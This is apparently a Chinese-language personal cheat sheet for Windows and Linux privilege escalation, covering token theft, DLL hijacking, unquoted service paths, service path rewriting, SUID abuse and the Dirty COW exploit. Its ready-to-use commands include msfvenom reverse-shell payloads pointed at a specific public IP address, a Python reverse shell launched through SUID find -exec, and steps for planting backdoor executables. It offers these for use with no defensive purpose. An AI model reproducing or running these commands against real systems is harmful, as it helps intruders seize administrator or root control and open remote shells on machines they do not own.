权限提示

windows提权思路

win溢出漏洞（大马远程获取基本信息，本地调用工具检测未打补丁漏洞）

执行命令systminfo获取补丁信息，看看一些要打的补丁没有打，可以直接使用msf进行攻击.或使用工具Windows Exploit Suggester该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较，并可以识别可能导致权限提升的漏洞，而其只需要目标系统的信息。

#更新漏洞数据库，会生成一个xls的文件，如下 2020-02-12-mssb.xls
python2 windows-exploit-suggester.py --update
 
#查看目标主机系统信息，保存为sysinfo.txt文件
systeminfo > sysinfo.txt
 
#然后运行如下命令，查看该系统是否存在可利用的提权漏洞
python2 windows-exploit-suggester.py -d 2020-02-12-mssb.xls -i sysinfo.txt

计划任务（本地提权）

at&sc&ps（官方软件psexec.exe） 设计好计划任务，弹出cmd，为system权限.系统bug.

数据库提取（前提获取数据库用户名和密码）

mysql：

udf，mof，启动项提取

mssql：（存在于windows）

xp_cmdshell，sp_cacreate，沙盒提权

oracle：（网址一般是jsp，java网址权限高不需要提权）

工具：oracleshell

Redis：

计划任务提权（几条命令的事）

PostgreSQL：（使用poc）

CVE-2019-9193，CVE-2018-1058

Windows2008之前-令牌窃取-本地/web（web环境须可启动exe文件）

攻击者服务器启动msf输入以下命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=124.222.87.79 LPORT=5577 -f exe -o /root/ok.exe  #生成后门放被攻击者主机
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 0.0.0.0
set lport 5577
exploit
被攻击者点击exe文件接收数据后输入下面命令

　　use incognito
　　list_tokens -u

　　impersonate_token "LIUYANG\administrator"

进程注入：

利用工具pinjector.exe（windows2008版本之前）

pinjector.exe -l  #看进程

pinjector.exe -p pid(进程的pid) cmd.exe  5577(接收端口)

烂土豆配合令牌窃取提权（web iis或数据库权限）

令牌窃取后

use incognito

list_tokens -u  后发现没有sytem权限，允许potato.exe

execute -cH -f ./potato.exe

list_tokens -u

impersonate_token "NT AUTHORITY\SYSTEM"

dll劫持

发现对方电脑存在Listary，随后在自己电脑上下载并使用火绒剑分析进程，发现该进程为ListaryHook.dll数字签名文件且在Listary文件目录下，随后使用

msf命令生成msfvenom -p windows/meterpreter/reverse_tcp lhost=124.222.87.79 lport=5577 -f dll >/opt/a.dll     #a.dll  

将生成后的a.dll放到Listary目录下改名为ListaryHook.dl覆盖原来的文件，启动文件这边监听5577端口，成功建立连接后getuid发现为普通用户权限，随后令牌窃取获得system权限.（被攻击机为win10）

Win2012-不带引号服务路径配合MSF-web  本地提权

wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v“C:\Windows\” |findstr /i /v “” ”    #命令能够筛选出不带引号的服务，还需存在空格

C:\Program Files (x86)\Acunetix\wvs_supervisor.exe  假设这个服务，我们只需在c盘目录下放置Program.exe后门文件，当服务启动的时候就会调用Program这个后门文件.

AccessChk （本地）

accesschk64.exe -uwcqv "user" *    #看有没有user可启动的服务，没有就gg，有的话使用

sc config “服务名” binpath=“后门路径”

sc start "服务名"

相对于改服务路径为后门路径，启动服务后启动后门.

Linux提权思路

信息收集：LinEnum.sh    linuxprivchecker.py

漏洞探针：linux-exploit-suggester.sh   linux-exploit-suggester2.pl

SUID提权

探测suid权限应用（Nmap  Vim   find  Bash  More  Less  Nano  cp ）  命令：find / -perm -u=s -type f 2>/dev/null  

，在运行后在后面加上普通用户不可执行的命令如调用find命令后面加上  -exec，然后在-exec后面加上下面命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \; #反弹一个sh类型的shell

find -name vulhub -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;  #最后运行

非常好用，本质就是suid权限文件运行会以root运行.所以后面的代码也会以root来运行.

内核漏洞提权（本地）

1.连接-寻找可利用提权漏洞-上传exp-提权               2.上传漏洞探测或其他方式-寻找到可利用提权漏洞-msf利用漏洞--提权

脏牛漏洞(CVE-2016-5195)  webshell低权限提权

冰蝎连接后反弹shell到msf，将dcow.cpp上传到目标主机，（upload /tmp/dcow.cpp   /tmp/40847.cpp）

启动shell会话，编译 （g++ -Wall -pedantic -02 -std=c++11 -pthread -o dcow 40847.cpp -lutil   )

ls发现目录下生成dcow，开启终端  python -c 'import pty; pty.spawn("/bin/bash")'    最后执行  ./dcow   成功后回给密码，切换su root，输入密码获取root权限